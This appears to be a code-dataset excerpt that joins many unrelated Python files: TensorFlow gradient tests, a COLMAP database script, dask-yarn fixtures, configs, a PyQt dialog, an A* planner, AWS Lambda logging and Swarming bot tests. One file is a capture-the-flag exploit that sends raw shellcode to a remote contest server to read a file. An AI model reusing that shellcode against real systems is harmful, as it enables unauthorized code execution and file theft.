ngrads_expected = [-1, 0]
elif gradient == "identity":
pgrads_expected = [1, 1]
ngrads_expected = [-1, -1]
else:
pgrads_expected = [1, 1]
ngrads_expected = [-1, 0]
with self.cached_session() as sess:
outputs, pgrads, ngrads = sess.run(
[outputs, pgrads, ngrads], {inputs: inputs_feed})
self.assertAllEqual(outputs, outputs_expected)
self.assertAllEqual(pgrads, pgrads_expected)
self.assertAllEqual(ngrads, ngrads_expected)
def test_upper_bound_disconnected(self):
self._test_upper_bound("disconnected")
def test_upper_bound_identity(self):
self._test_upper_bound("identity")
def test_upper_bound_identity_if_towards(self):
self._test_upper_bound("identity_if_towards")
def test_upper_bound_invalid(self):
with self.assertRaises(ValueError):
self._test_upper_bound("invalid")
def _test_lower_bound(self, gradient):
inputs = tf.compat.v1.placeholder(dtype=tf.float32)
outputs = math_ops.lower_bound(inputs, 0, gradient=gradient)
pgrads, = tf.gradients([outputs], [inputs], [tf.ones_like(inputs)])
ngrads, = tf.gradients([outputs], [inputs], [-tf.ones_like(inputs)])
inputs_feed = [-1, 1]
outputs_expected = [0, 1]
if gradient == "disconnected":
pgrads_expected = [0, 1]
ngrads_expected = [0, -1]
elif gradient == "identity":
pgrads_expected = [1, 1]
ngrads_expected = [-1, -1]
else:
pgrads_expected = [0, 1]
ngrads_expected = [-1, -1]
with self.cached_session() as sess:
outputs, pgrads, ngrads = sess.run(
[outputs, pgrads, ngrads], {inputs: inputs_feed})
self.assertAllEqual(outputs, outputs_expected)
self.assertAllEqual(pgrads, pgrads_expected)
self.assertAllEqual(ngrads, ngrads_expected)
def test_lower_bound_disconnected(self):
self._test_lower_bound("disconnected")
def test_lower_bound_identity(self):
self._test_lower_bound("identity")
def test_lower_bound_identity_if_towards(self):
self._test_lower_bound("identity_if_towards")
def test_lower_bound_invalid(self):
with self.assertRaises(ValueError):
self._test_lower_bound("invalid")
class PerturbAndApplyTest(tf.test.TestCase):
def test_perturb_and_apply_noise(self):
x = tf.random.normal([10000], seed=0)
y, x_plus_u0 = math_ops.perturb_and_apply(
tf.identity, x, expected_grads=True)
u0 = x_plus_u0-x
u1 = y - x
# Check if residuals are as expected
self.assertAllClose(u0, u1)
# Check if noise has expected uniform distribution
_, p = scipy.stats.kstest(u0, "uniform", (-0.5, 1.0))
self.assertAllLessEqual(tf.abs(u0), 0.5)
self.assertGreater(p, 1e-6)
def test_perturb_and_apply_gradient_soft_round(self):
f = soft_round_ops.soft_round
x = tf.linspace(-2.0, 2.0, 200)
temperature = 7.0
with tf.GradientTape(persistent=True) as g:
g.watch(x)
y = math_ops.perturb_and_apply(f, x, temperature, expected_grads=True)[0]
dx = g.gradient(y, x)
self.assertAllClose(dx, tf.ones_like(dx))
def test_perturb_and_apply_gradient_parabola(self):
f = lambda x, a: a*x*x
x = tf.linspace(-2.0, 2.0, 200)
a = 7.0
with tf.GradientTape(persistent=True) as g:
g.watch(x)
y = math_ops.perturb_and_apply(f, x, a, expected_grads=True)[0]
dx = g.gradient(y, x)
self.assertAllClose(dx, f(x+.5, a)-f(x-.5, a))
if __name__ == "__main__":
tf.test.main()
| StarcoderdataPython |
1903458 | # coding: utf-8
import os
import numpy as np
from database import *
from read_write_model import *
import cv2
import pcl
def get_default_camera_model(img_path_name, camera_id):
img = cv2.imread(img_path_name)
if img is None:
print('failed to load image:', img_path_name)
return None
# 行, 列, 通道
hh, ww, cc = img.shape
focal_length = ww * 1.2
cx = ww * 0.5
cy = hh * 0.5
elems = [focal_length, cx, cy, 0.0]
params = np.array(tuple(map(float, elems)))
cam = Camera(id=int(camera_id), model='SIMPLE_RADIAL', width=ww, height=hh, params=params)
return cam
def get_fisheye_camera_model(img_path_name, camera_id):
img = cv2.imread(img_path_name)
if img is None:
print('failed to load image:', img_path_name)
return None
# 行, 列, 通道
hh, ww, cc = img.shape
focal_length = ww * 1.2
cx = ww * 0.5
cy = hh * 0.5
elems = [focal_length, cx, cy, 0.0, 0.0]
params = np.array(tuple(map(float, elems)))
cam = Camera(id=int(camera_id), model='RADIAL_FISHEYE', width=ww, height=hh, params=params)
return cam
def get_image_model(tum, image_id, camera_id, image_name):
# tum是TC2W,但是colmap需要TW2C
# tum_inv = io_tool.tum_str_inv(tum)
tum_inv = tum
colmap_tvec = [tum_inv[1], tum_inv[2], tum_inv[3]]
tvec = np.array(tuple(map(float, colmap_tvec)))
colmap_qvec = [tum_inv[7], tum_inv[4], tum_inv[5], tum_inv[6]]
qvec = np.array(tuple(map(float, colmap_qvec)))
xys = np.array([''])
point3D_ids = np.array([''])
img = Image(id=image_id, qvec=qvec, tvec=tvec, camera_id=camera_id, name=image_name, xys=xys, point3D_ids=point3D_ids)
return img
if __name__ == '__main__':
db = COLMAPDatabase.connect(database_path_name)
db.create_tables()
cam = get_default_camera_model(first_image, 1)
model_id = CAMERA_MODEL_NAMES[cam.model].model_id
db.add_camera(model_id, cam.width, cam.height, cam.params, prior_focal_length=False, camera_id=cam.id)
img = get_image_model(traj, count, cam.id, "cam/" + time_str + ".png")
db.add_image(img.name, img.camera_id, prior_q=img.qvec, prior_t=img.tvec, image_id=img.id)
cam = get_fisheye_camera_model(first_image,i+2)
model_id = CAMERA_MODEL_NAMES[cam.model].model_id
db.add_camera(model_id, cam.width, cam.height, cam.params, prior_focal_length=False, camera_id=cam.id)
db.add_image(img.name, img.camera_id, prior_q=img.qvec, prior_t=img.tvec, image_id=img.id)
db.commit()
print('after insert data to table:')
cursor = db.cursor()
cursor.execute("select * from cameras")
results = cursor.fetchall()
print('cameras number:', len(results))
cursor = db.cursor()
cursor.execute("select * from images")
results = cursor.fetchall()
print('images number:', len(results))
cursor = db.cursor()
cursor.execute("select * from keypoints")
results = cursor.fetchall()
print('keypoints number:', len(results))
db.close()
print("Raw Data to database success!") | StarcoderdataPython |
3348015 | import pytest
import skein
import os
import sys
import time
import subprocess
@pytest.fixture(scope="session")
def conda_env():
envpath = "dask-yarn-py%d%d.tar.gz" % sys.version_info[:2]
if not os.path.exists(envpath):
conda_pack = pytest.importorskip("conda_pack")
conda_pack.pack(output=envpath, verbose=True)
return envpath
@pytest.fixture(scope="session")
def skein_client():
with skein.Client() as client:
yield client
def check_is_shutdown(client, app_id, status="SUCCEEDED"):
timeleft = 10
report = client.application_report(app_id)
while report.state not in ("FINISHED", "FAILED", "KILLED"):
time.sleep(0.1)
timeleft -= 0.1
report = client.application_report(app_id)
if timeleft < 0:
client.kill_application(app_id)
logs = get_logs(app_id)
print(
"Application wasn't properly terminated, killed by test fixture.\n"
"\n"
"Application Logs\n"
"----------------\n"
"%s" % logs
)
assert False, "Application wasn't properly terminated"
if report.final_status != status:
logs = get_logs(app_id)
print(
"Expected application to terminate with status==%s, got status==%s\n"
"\n"
"Application Logs\n"
"----------------\n"
"%s" % (status, report.final_status, logs)
)
assert report.final_status == status
def get_logs(app_id, tries=3):
command = ["yarn", "logs", "-applicationId", app_id]
for i in range(tries - 1):
try:
return subprocess.check_output(command).decode()
except Exception:
pass
time.sleep(1)
return subprocess.check_output(command).decode() | StarcoderdataPython |
3240691 |
from gaia_project.communication_layer import LocalCommunicationLayer
from gaia_project.engine import Engine
if __name__ == '__main__':
cl = LocalCommunicationLayer()
en = Engine(cl)
cl.board.highlight_hex((6,6))
cl.update_gfx()
en.run()
| StarcoderdataPython |
279 | import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.getenv('SECRET_KEY', '')
DEBUG = False
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'flask_main.db')
SQLALCHEMY_TRACK_MODIFICATIONS = False
class TestingConfig(Config):
DEBUG = True
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'flask_main.db')
PRESERVE_CONTEXT_ON_EXCEPTION = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
class ProductionConfig(Config):
DEBUG = False
config_by_name = dict(
dev=DevelopmentConfig,
test=TestingConfig,
prod=ProductionConfig
)
key = Config.SECRET_KEY
| StarcoderdataPython |
6443762 | <gh_stars>0
import os
# Server Information
username = '<serverusername>'
password = '<<PASSWORD>>'
ipaddr = '<ipadress>'
port = 22
# Website Information<
website = 'amt-tutorial'
htdocsUrl = 'https://www.yoururl.com/' + website
htdocsPath = '/var/www/html/' + website
# BEGIN NEW CODE
# AMT Configuration
dollarPerHour = 6.00
expTimeMin = 1.0
hitRewardDollar = (expTimeMin / 60.0 ) * dollarPerHour;
turkConfig = {
'live' : False,
'questionUrl' : '%s/cgi-bin/turkserv.py' % (htdocsUrl),
'questionFrameHeight' : 600,
'hitTitle' : "Identify a letter as rapidly as possible.",
'hitDescription' : 'Identify a letter as rapidly as possible.',
'hitKeywords' : "experiment, psychology",
'hitDurationSec' : 1800,
'hitRewardDollar' : hitRewardDollar,
'maxAssignments' : 1,
'awsAccessId' : 'AFAKEACCESSKEY',
'awsSecretKey' : 'AFAKESECRETKEY',
'quals' : [
['NumberHitsApprovedRequirement', 'GreaterThanOrEqualTo', 100],
['PercentAssignmentsApprovedRequirement', 'GreaterThanOrEqualTo', 90],
['LocaleRequirement', 'EqualTo', 'US']
]
}
submitUrl = 'https://www.mturk.com/mturk/externalSubmit' if turkConfig['live'] else \
'https://workersandbox.mturk.com/mturk/externalSubmit'
# END NEW CODE
# Experiment Configuration
expConfig = {
'codeVersion' : 'v0',
'website' : website,
'htdocsUrl' : htdocsUrl,
'nTrial' : 10,
'debugOn' : True,
'doRecord' : True,
'submitUrl' : submitUrl,
'expTimeMin' : expTimeMin
}
| StarcoderdataPython |
9638053 | <filename>view/gererActions.py<gh_stars>0
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gererActions.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_DialogGererActions(object):
def setupUi(self, DialogGererActions):
DialogGererActions.setObjectName("DialogGererActions")
DialogGererActions.resize(578, 505)
DialogGererActions.setMinimumSize(QtCore.QSize(578, 505))
DialogGererActions.setMaximumSize(QtCore.QSize(578, 505))
DialogGererActions.setSizeGripEnabled(True)
DialogGererActions.setModal(True)
self.listeEtape = QtWidgets.QListView(DialogGererActions)
self.listeEtape.setGeometry(QtCore.QRect(90, 20, 471, 261))
self.listeEtape.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.listeEtape.setWordWrap(True)
self.listeEtape.setObjectName("listeEtape")
self.horizontalLayoutWidget = QtWidgets.QWidget(DialogGererActions)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(13, 281, 551, 181))
self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
self.layoutEtape = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
self.layoutEtape.setContentsMargins(0, 0, 0, 0)
self.layoutEtape.setObjectName("layoutEtape")
self.layoutSaisie = QtWidgets.QFormLayout()
self.layoutSaisie.setObjectName("layoutSaisie")
self.labelOrdre = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.labelOrdre.setObjectName("labelOrdre")
self.layoutSaisie.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.labelOrdre)
self.textOrdre = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.textOrdre.setObjectName("textOrdre")
self.layoutSaisie.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.textOrdre)
self.labelEtape = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.labelEtape.setObjectName("labelEtape")
self.layoutSaisie.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.labelEtape)
self.textEtape = QtWidgets.QTextEdit(self.horizontalLayoutWidget)
self.textEtape.setObjectName("textEtape")
self.layoutSaisie.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.textEtape)
self.inputDate = QtWidgets.QDateTimeEdit(self.horizontalLayoutWidget)
self.inputDate.setCalendarPopup(True)
self.inputDate.setObjectName("inputDate")
self.layoutSaisie.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.inputDate)
self.buttonAjouterModifier = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.buttonAjouterModifier.setObjectName("buttonAjouterModifier")
self.layoutSaisie.setWidget(4, QtWidgets.QFormLayout.SpanningRole, self.buttonAjouterModifier)
self.checkBoxDate = QtWidgets.QCheckBox(self.horizontalLayoutWidget)
self.checkBoxDate.setObjectName("checkBoxDate")
self.layoutSaisie.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.checkBoxDate)
self.labelDate = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.labelDate.setObjectName("labelDate")
self.layoutSaisie.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.labelDate)
self.layoutEtape.addLayout(self.layoutSaisie)
self.verticalFait = QtWidgets.QVBoxLayout()
self.verticalFait.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalFait.setContentsMargins(0, -1, -1, -1)
self.verticalFait.setObjectName("verticalFait")
self.horizontalLayoutFait = QtWidgets.QHBoxLayout()
self.horizontalLayoutFait.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.horizontalLayoutFait.setObjectName("horizontalLayoutFait")
self.labelFait = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.labelFait.setObjectName("labelFait")
self.horizontalLayoutFait.addWidget(self.labelFait)
self.labelFaitValue = QtWidgets.QLabel(self.horizontalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.labelFaitValue.setFont(font)
self.labelFaitValue.setObjectName("labelFaitValue")
self.horizontalLayoutFait.addWidget(self.labelFaitValue)
self.verticalFait.addLayout(self.horizontalLayoutFait)
self.buttonChangerEtat = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.buttonChangerEtat.setObjectName("buttonChangerEtat")
self.verticalFait.addWidget(self.buttonChangerEtat)
self.layoutEtape.addLayout(self.verticalFait)
self.buttonDialog = QtWidgets.QDialogButtonBox(DialogGererActions)
self.buttonDialog.setGeometry(QtCore.QRect(13, 468, 551, 31))
self.buttonDialog.setOrientation(QtCore.Qt.Horizontal)
self.buttonDialog.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonDialog.setObjectName("buttonDialog")
self.buttonMonter = QtWidgets.QPushButton(DialogGererActions)
self.buttonMonter.setGeometry(QtCore.QRect(10, 20, 71, 23))
self.buttonMonter.setObjectName("buttonMonter")
self.buttonDescendre = QtWidgets.QPushButton(DialogGererActions)
self.buttonDescendre.setGeometry(QtCore.QRect(10, 80, 71, 23))
self.buttonDescendre.setObjectName("buttonDescendre")
self.buttonSupprimer = QtWidgets.QPushButton(DialogGererActions)
self.buttonSupprimer.setGeometry(QtCore.QRect(10, 50, 71, 23))
self.buttonSupprimer.setObjectName("buttonSupprimer")
self.retranslateUi(DialogGererActions)
self.buttonDialog.accepted.connect(DialogGererActions.accept)
self.buttonDialog.rejected.connect(DialogGererActions.reject)
QtCore.QMetaObject.connectSlotsByName(DialogGererActions)
def retranslateUi(self, DialogGererActions):
_translate = QtCore.QCoreApplication.translate
DialogGererActions.setWindowTitle(_translate("DialogGererActions", "Gérer les étapes"))
self.labelOrdre.setText(_translate("DialogGererActions", "Ordre"))
self.labelEtape.setText(_translate("DialogGererActions", "Etape"))
self.buttonAjouterModifier.setText(_translate("DialogGererActions", "Editer"))
self.checkBoxDate.setText(_translate("DialogGererActions", "Rajouter une date d\'éxécution"))
self.labelDate.setText(_translate("DialogGererActions", "Date"))
self.labelFait.setText(_translate("DialogGererActions", "Etat : "))
self.labelFaitValue.setText(_translate("DialogGererActions", "A faire"))
self.buttonChangerEtat.setText(_translate("DialogGererActions", "Inverser l\'état"))
self.buttonMonter.setText(_translate("DialogGererActions", "Monter"))
self.buttonDescendre.setText(_translate("DialogGererActions", "Descendre"))
self.buttonSupprimer.setText(_translate("DialogGererActions", "Supprimer"))
| StarcoderdataPython |
11218916 | <filename>rest_rpc/training/core/hypertuners/abstract.py
#!/usr/bin/env python
####################
# Required Modules #
####################
# Generic/Built-in
import abc
import logging
from typing import Dict
# Libs
# Custom
##################
# Configurations #
##################
########################################
# Abstract Tuner Class - AbstractTuner #
########################################
class AbstractTuner(abc.ABC):
@abc.abstractmethod
def tune(self):
""" Performs federated training using a pre-specified model as a
template, across initialised worker nodes, coordinated by a ttp
node, across a specified range of hyperparameters, to obtain optimal
performance
"""
pass
| StarcoderdataPython |
5177184 | ### Title: Format BibTex file
### Author: <NAME>
### Created: 2019-10-29
### Modified: 2019-11-04
### USAGE:
### python formatBibFile.py IN_FILE OUT_FILE
### ARGS:
### IN_FILE = Absolute or relative path (including file name and extension)
### to the file to be formatted
### OUT_FILE = Absolute or relative path (including file name and extension)
### to the file to be produced
import sys
import modBibFiles as mbf
## Extract command line arguments:
args = sys.argv
## Add annotations to BibTex file:
mbf.formatBib(iFile = args[1], oFile = args[2])
| StarcoderdataPython |
116000 | <filename>tasks_sprints_12/d_caring_mother.py
# <NAME>
# ID успешной посылки 65663041
class Node:
def __init__(self, value, next_item=None):
self.value = value
self.next_item = next_item
def solution(node, elem):
count = 0
while node.value != elem:
if node.value != elem and node.next_item is None:
count = -1
break
else:
count = count + 1
node = node.next_item
return count
def test():
node3 = Node("node3", None)
node2 = Node("node2", node3)
node1 = Node("node1", node2)
node0 = Node("node0", node1)
solution(node0, "node4")
# result is idx == 2
if __name__ == '__main__':
test()
| StarcoderdataPython |
3497701 | <filename>insomni'hack-2015/shellcoding/bluepill/exploit.py<gh_stars>1-10
import socket
s=socket.create_connection(('bluepill.insomni.hack', 4444))
print s.recv(4096)
sh="\xeb\x3f\x5f\x80\x77\x1c\x42\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x74\x68\x69\x73\x69\x73\x61\x76\x65\x72\x79\x72\x61\x6e\x64\x6f\x6d\x6e\x61\x6d\x65\x61\x6d\x69\x72\x69\x74\x65\x42"
payload = "\x87\xd6"
payload += "\xeb\xd4"
payload += sh
open('payload', 'w').write(payload)
s.send(payload)
print s.recv(4096)
| StarcoderdataPython |
1751515 | import gzip
import json
import base64
import logging
from datetime import datetime
import re
from typing import Any
import boto3
# Set up logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
ec2_resource = boto3.resource('ec2', region_name='us-west-2')
table = boto3.resource('dynamodb', region_name='us-west-2').Table('XGBoostCIWorkerProvisionRecord')
def get_os_of_ami(image_id: str) -> str:
image = ec2_resource.Image(image_id)
platform_details = image.platform_details
assert platform_details in ['Linux/UNIX', 'Windows']
if platform_details == 'Linux/UNIX':
return 'Linux'
return platform_details
def lambda_handler(event: Any, context: Any):
cw_data = event['awslogs']['data']
compressed_payload = base64.b64decode(cw_data)
uncompressed_payload = gzip.decompress(compressed_payload)
payload = json.loads(uncompressed_payload)
log_events = payload['logEvents']
for log_event in log_events:
message = json.loads(log_event['message'])
if ('eventType' not in message):
logger.debug(f'Message not well-formed: {message}')
continue
if message['eventType'] != 'AwsApiCall':
# Skip events that are not API calls, such as Insights
continue
if ('eventName' not in message) or ('eventTime' not in message):
logger.debug(f'Message not well-formed: {message}')
continue
event_name = message['eventName']
event_time = message['eventTime']
if event_name == 'RunInstances':
if (('responseElements' not in message)
or (not message['responseElements'])
or ('instancesSet' not in message['responseElements'])
or (not message['responseElements']['instancesSet'])
or ('items' not in message['responseElements']['instancesSet'])):
# RunInstance that did not succeed
continue
for ordinal, ec2 in enumerate(message['responseElements']['instancesSet']['items']):
ec2_id = ec2['instanceId']
ec2_type = ec2['instanceType']
ec2_os = get_os_of_ami(ec2['imageId'])
logger.info(f'RunInstances, InstanceID = {ec2_id} @ {event_time}')
table.put_item(Item={
'Date': event_time.split(sep='T', maxsplit=1)[0],
'Timestamp-Ordinal': f'{event_time}#{ordinal}',
'EventName': 'RunInstances',
'InstanceID': ec2_id,
'InstanceType': ec2_type,
'InstanceOS': ec2_os})
elif event_name == 'TerminateInstances':
if (('responseElements' not in message)
or (not message['responseElements'])
or ('instancesSet' not in message['responseElements'])
or (not message['responseElements']['instancesSet'])
or ('items' not in message['responseElements']['instancesSet'])):
# TerminateInstances that did not succeed
continue
for ordinal, ec2 in enumerate(message['responseElements']['instancesSet']['items']):
ec2_id = ec2['instanceId']
logger.info(f'TerminateInstances, InstanceID = {ec2_id} @ {event_time}')
table.put_item(Item={
'Date': event_time.split(sep='T', maxsplit=1)[0],
'Timestamp-Ordinal': f'{event_time}#{ordinal}',
'EventName': 'TerminateInstances',
'InstanceID': ec2_id})
| StarcoderdataPython |
11371029 | # Generated by Django 3.1.3 on 2021-08-20 17:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pic', '0002_auto_20210820_1020'),
]
operations = [
migrations.AddField(
model_name='model_image',
name='accuracy',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='model_image',
name='symptom',
field=models.CharField(max_length=20, null=True),
),
]
| StarcoderdataPython |
11352620 | <reponame>bbueno5000/path_planning_demo_live<gh_stars>0
"""
We're gonna take a 10 x 10 grid of squares.
Obstacles are black squares.
Objects defined by shape, size, color.
Each square gets an x, y coordinate.
Return list of occupied grids using computer vision.
Find minimimum path between starting object and matching object using a star search.
"""
import cv2
import numpy
import skimage.metrics
import time
class ProcessImage:
"""
TODO: docstring
"""
def main(image_filename):
"""
Returns:
- List of tuples which is the coordinates for occupied grid.
- Dictionary with information of path.
"""
occupied_grids = []
planned_path = {}
image = cv2.imread(image_filename)
(winW, winH) = (60, 60)
obstacles = []
index = [1, 1]
blank_image = numpy.zeros((60, 60, 3), numpy.uint8)
list_images = [[blank_image for i in range(10)] for i in range(10)]
maze = [[0 for i in range(10)] for i in range(10)]
for (x, y, window) in ProcessImage.sliding_window(image, stepSize=60, windowSize=(winW, winH)):
if window.shape[0] != winH or window.shape[1] != winW:
continue
clone = image.copy()
cv2.rectangle(clone, (x, y), (x + winW, y + winH), (0, 255, 0), 2)
crop_img = image[x:x+winW, y:y+winH]
list_images[index[0]-1][index[1]-1] = crop_img.copy()
average_color_per_row = numpy.average(crop_img, axis=0)
average_color = numpy.average(average_color_per_row, axis=0)
average_color = numpy.uint8(average_color)
if any(i <= 240 for i in average_color):
maze[index[1]-1][index[0]-1] = 1
occupied_grids.append(tuple(index))
if any(i <= 20 for i in average_color):
obstacles.append(tuple(index))
cv2.imshow('Window', clone)
cv2.waitKey(1)
time.sleep(0.025)
index[1] = index[1] + 1
if index[1] > 10:
index[0] = index[0] + 1
index[1] = 1
list_colored_grids = [n for n in occupied_grids if n not in obstacles]
for startimage in list_colored_grids:
key_startimage = startimage
img1 = list_images[startimage[0]-1][startimage[1]-1]
for grid in [n for n in list_colored_grids if n != startimage]:
img = list_images[grid[0]-1][grid[1]-1]
image = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
image2 = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
s = skimage.metrics.structural_similarity(image, image2)
if s > 0.9:
result = ProcessImage.astar(
maze, (startimage[0]-1, startimage[1]-1), (grid[0]-1, grid[1]-1))
list2 = []
for t in result:
x, y = t[0], t[1]
list2.append(tuple((x + 1, y + 1)))
result = list(list2[1:-1])
if not result:
planned_path[startimage] = list(['NO PATH', [], 0])
planned_path[startimage] = list([str(grid), result, len(result)+1])
for obj in list_colored_grids:
if obj not in planned_path:
planned_path[obj] = list(['NO MATCH', [], 0])
return occupied_grids, planned_path
def astar(m, startp, endp):
"""
A* Search algorithm implementation to find the minimum path between 2 points.
"""
w, h = 10, 10
sx, sy = startp
ex, ey = endp
node = [None, sx, sy, 0, abs(ex-sx)+abs(ey-sy)]
closeList = [node]
createdList = {}
createdList[sy*w+sx] = node
k=0
while(closeList):
node = closeList.pop(0)
x = node[1]
y = node[2]
l = node[3] + 1
k += 1
if k != 0:
neighbours = ((x, y+1), (x, y-1), (x+1, y), (x-1, y))
else:
neighbours = ((x+1, y), (x-1, y), (x, y+1), (x, y-1))
for nx,ny in neighbours:
if nx==ex and ny==ey:
path = [(ex, ey)]
while node:
path.append((node[1], node[2]))
node = node[0]
return list(reversed(path))
if 0 <= nx < w and 0 <= ny < h and m[ny][nx] == 0:
if ny * w + nx not in createdList:
nn = (node, nx, ny, l, l+abs(nx-ex)+abs(ny-ey))
createdList[ny*w+nx] = nn
nni = len(closeList)
closeList.append(nn)
while nni:
i = (nni-1) >> 1
if closeList[i][4] > nn[4]:
closeList[i], closeList[nni] = nn, closeList[i]
nni = i
else:
break
return list()
def sliding_window(image, stepSize, windowSize):
"""
Traversing through the image to perform image processing
"""
for y in range(0, image.shape[0], stepSize):
for x in range(0, image.shape[1], stepSize):
yield (x, y, image[y: y+windowSize[1], x: x+windowSize[0]])
if __name__ == '__main__':
occupied_grids, planned_path = ProcessImage.main('data\\input\\image_4.jpg')
print('Occupied Grid:')
print(occupied_grids)
print('Planned Path:')
print(planned_path)
| StarcoderdataPython |
1757709 | <reponame>heatherleaf/sparv-pipeline
from sparv import Config, SourceStructureParser, wizard
__config__ = [
Config("export.default", description="List of exporters to use by default"),
Config("export.annotations", description="List of automatic annotations to include in export"),
Config("export.source_annotations", description="List of annotations and attributes from the source to include"),
Config("export.header_annotations", description="List of headers from the source data to include"),
Config("export.word", description="Annotation to use as token text in export"),
Config("export.remove_module_namespaces",
description="Remove module name prefixes from annotation names in export"),
Config("export.sparv_namespace", description="Prefix to add to the names of all automatically created annotations"),
Config("export.source_namespace", description="Prefix to add to the names of all annotations from source"),
Config("export.scramble_on", description="What annotation to use as the smallest unit when scrambling")
]
@wizard(["export.source_annotations"], source_structure=True)
def import_wizard(answers, structure: SourceStructureParser):
"""Return wizard for selecting what source annotations to keep."""
questions = [
{
"type": "select",
"name": "_keep_source",
"message": "What existing annotations from the source files do you want to keep?",
"choices": [
{"name": "All of them", "value": "all", "short": "All"},
{"name": "Some of them; I’ll list which ones I want to keep.", "value": "whitelist",
"short": "Keep some"},
{"name": "Most of them; I’ll list which ones to exclude.", "value": "blacklist",
"short": "Discard some"}
# {"name": "None of them; Do not choose this if you want to export to XML!", "value": []}
]
},
{
"when": lambda x: x.get("_keep_source") == "whitelist",
"type": "checkbox",
"name": "export.source_annotations",
"message": "Select the annotations to keep:",
"choices": structure.get_annotations
},
{
"when": lambda x: x.get("_keep_source") == "blacklist",
"type": "checkbox",
"name": "export.source_annotations",
"message": "Select the annotations to exclude:",
"choices": [{
"name": annotation,
"value": f"not {annotation}"
} for annotation in structure.get_annotations(answers)]
}
]
return questions
| StarcoderdataPython |
5153353 | #!/usr/bin/env python
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import datetime
import hashlib
import logging
import sys
import unittest
import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from test_support import test_case
from server import bot_management
_VERSION = hashlib.sha256().hexdigest()
class BotManagementTest(test_case.TestCase):
def test_all_apis_are_tested(self):
actual = frozenset(i[5:] for i in dir(self) if i.startswith('test_'))
# Contains the list of all public APIs.
expected = frozenset(
i for i in dir(bot_management)
if i[0] != '_' and hasattr(getattr(bot_management, i), 'func_name'))
missing = expected - actual
self.assertFalse(missing)
def test_dimensions_to_flat(self):
self.assertEqual(
['a:b', 'c:d'], bot_management.dimensions_to_flat({'a': 'b', 'c': 'd'}))
def test_bot_event(self):
# connected.
now = datetime.datetime(2010, 1, 2, 3, 4, 5, 6)
self.mock_now(now)
bot_management.bot_event(
event_type='bot_connected', bot_id='id1',
external_ip='8.8.4.4', authenticated_as='bot:id1.domain',
dimensions={'id': ['id1'], 'foo': ['bar']}, state={'ram': 65},
version=hashlib.sha256().hexdigest(), quarantined=False, task_id=None,
task_name=None)
expected = {
'authenticated_as': u'bot:id1.domain',
'composite': [32, 8, 2],
'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
'external_ip': u'8.8.4.4',
'first_seen_ts': now,
'id': 'id1',
'last_seen_ts': now,
'lease_id': None,
'lease_expiration_ts': None,
'machine_type': None,
'quarantined': False,
'state': {u'ram': 65},
'task_id': None,
'task_name': None,
'version': _VERSION,
}
self.assertEqual(
expected, bot_management.get_info_key('id1').get().to_dict())
def test_get_events_query(self):
now = datetime.datetime(2010, 1, 2, 3, 4, 5, 6)
self.mock_now(now)
bot_management.bot_event(
event_type='bot_connected', bot_id='id1',
external_ip='8.8.4.4', authenticated_as='bot:id1.domain',
dimensions={'id': ['id1'], 'foo': ['bar']}, state={'ram': 65},
version=hashlib.sha256().hexdigest(), quarantined=False, task_id=None,
task_name=None)
expected = [
{
'authenticated_as': u'bot:id1.domain',
'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
'event_type': u'bot_connected',
'external_ip': u'8.8.4.4',
'lease_id': None,
'lease_expiration_ts': None,
'machine_type': None,
'message': None,
'quarantined': False,
'state': {u'ram': 65},
'task_id': None,
'ts': now,
'version': _VERSION,
},
]
self.assertEqual(
expected,
[i.to_dict() for i in bot_management.get_events_query('id1', True)])
def test_bot_event_poll_sleep(self):
now = datetime.datetime(2010, 1, 2, 3, 4, 5, 6)
self.mock_now(now)
bot_management.bot_event(
event_type='request_sleep', bot_id='id1',
external_ip='8.8.4.4', authenticated_as='bot:id1.domain',
dimensions={'id': ['id1'], 'foo': ['bar']}, state={'ram': 65},
